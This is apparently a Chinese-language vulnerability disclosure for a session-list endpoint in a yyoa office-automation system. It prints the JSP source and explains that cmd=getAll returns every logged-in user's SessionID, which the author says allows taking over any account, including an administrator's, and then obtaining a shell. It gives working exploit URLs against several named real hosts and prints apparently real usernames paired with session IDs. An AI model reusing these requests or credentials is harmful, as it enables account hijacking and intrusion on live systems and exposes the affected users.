<p>该漏洞泄露了当前登录用户(所有登录的)的SessionID;<br><br>利用泄露的SessionID即可登录该用户,包括管理员,进入后getshell毫无压力<br><br>/yyoa/ext/https/getSessionList.jsp<br><br>部分代码<br><br></p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);"><%@ page contentType="text/html;charset=GBK"%><br style="margin: 0px; padding: 0px;"> <%@ page session= "false" %><br style="margin: 0px; padding: 0px;"> <%@ page import="net.btdz.oa.ext.https.*"%><br style="margin: 0px; padding: 0px;"> <%<br style="margin: 0px; padding: 0px;"> String reqType = request.getParameter("cmd");<br style="margin: 0px; padding: 0px;"> String outXML = "";<br style="margin: 0px; padding: 0px;"> boolean allowHttps = true;<br style="margin: 0px; padding: 0px;"> if("allowHttps".equalsIgnoreCase(reqType)){<br style="margin: 0px; padding: 0px;"> //add code to judge whether it allow https or not<br style="margin: 0px; padding:...
<p>该漏洞泄露了当前登录用户(所有登录的)的SessionID;<br><br>利用泄露的SessionID即可登录该用户,包括管理员,进入后getshell毫无压力<br><br>/yyoa/ext/https/getSessionList.jsp<br><br>部分代码<br><br></p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);"><%@ page contentType="text/html;charset=GBK"%><br style="margin: 0px; padding: 0px;"> <%@ page session= "false" %><br style="margin: 0px; padding: 0px;"> <%@ page import="net.btdz.oa.ext.https.*"%><br style="margin: 0px; padding: 0px;"> <%<br style="margin: 0px; padding: 0px;"> String reqType = request.getParameter("cmd");<br style="margin: 0px; padding: 0px;"> String outXML = "";<br style="margin: 0px; padding: 0px;"> boolean allowHttps = true;<br style="margin: 0px; padding: 0px;"> if("allowHttps".equalsIgnoreCase(reqType)){<br style="margin: 0px; padding: 0px;"> //add code to judge whether it allow https or not<br style="margin: 0px; padding: 0px;"> allowHttps = FetchSessionList.checkHttps();<br style="margin: 0px; padding: 0px;"> if (allowHttps) response.setHeader("AllowHttps","1");<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> if("getAll".equalsIgnoreCase(reqType)){<br style="margin: 0px; padding: 0px;"> outXML = FetchSessionList.getXMLAll();<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> else if("getSingle".equalsIgnoreCase(reqType)){<br style="margin: 0px; padding: 0px;"> String sessionId = request.getParameter("ssid");<br style="margin: 0px; padding: 0px;"> if(sessionId != null){<br style="margin: 0px; padding: 0px;"> outXML = FetchSessionList.getXMLBySessionId(sessionId);<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> else{<br style="margin: 0px; padding: 0px;"> outXML += "<?xml version=\"1.0\" encoding=\"GB2312\"?>\r\n";<br style="margin: 0px; padding: 0px;"> outXML += "<SessionList>\r\n";<br style="margin: 0px; padding: 0px;"> //outXML += "<Session>\r\n";<br style="margin: 0px; padding: 0px;"> //outXML += "</Session>\r\n";<br style="margin: 0px; padding: 0px;"> outXML += "</SessionList>\r\n";<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> out.println(outXML);<br style="margin: 0px; padding: 0px;"> %></code></pre><p><br><br>从上面的代码可知,当cmd参数为getAll时,便可获取到所有用户的SessionID<br><br>例如:<br><br><a href="http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br></p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">weiph 9EA4F8832FA1C9BA99E3D13E2F01CAF7<br style="margin: 0px; padding: 0px;"> zhaozy F9244E7F1B8C39BB8919FAE8E19ED16A</code></pre><p><br><br><a href="http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br></p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">huangsc 0088D0C9F166AD9E5C4907908B97CF2B<br style="margin: 0px; padding: 0px;"> jiangyl 1057A63B52E4D78CA92B989149D1AC37<br style="margin: 0px; padding: 0px;"> lisy 1586E35E947B4EF4C92AD27B8D1C279B<br style="margin: 0px; padding: 0px;"> zhongjh 1AE537BD94C0286CE5FFE0509B4AB6D0<br style="margin: 0px; padding: 0px;"> //...</code></pre><p><br><br><a href="http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br></p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">yanyongrong 372BE72272E0C6ABB3A5815AACAD5AB8<br style="margin: 0px; padding: 0px;"> wujianbo 5D33C475E451E080C074DD741F46470B <br style="margin: 0px; padding: 0px;"> wangluolijin 64CCB1F31B206ADA1716A8A0252137EA<br style="margin: 0px; padding: 0px;"> tianqinghua 78C93A5F4CEA64E34B654E8FEE470A1E <br style="margin: 0px; padding: 0px;"> lidalong 84037EF6F41432DE9EE907C94F7B091B <br style="margin: 0px; padding: 0px;"> liujianjun 98745C840A8BE288D91C50BB8D1F6A54</code></pre><p><br><br>案例:<br><br><a href="http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br><a href="http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br><a href="http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br><a href="http://60.31.196.2/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://60.31.196.2/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br></p>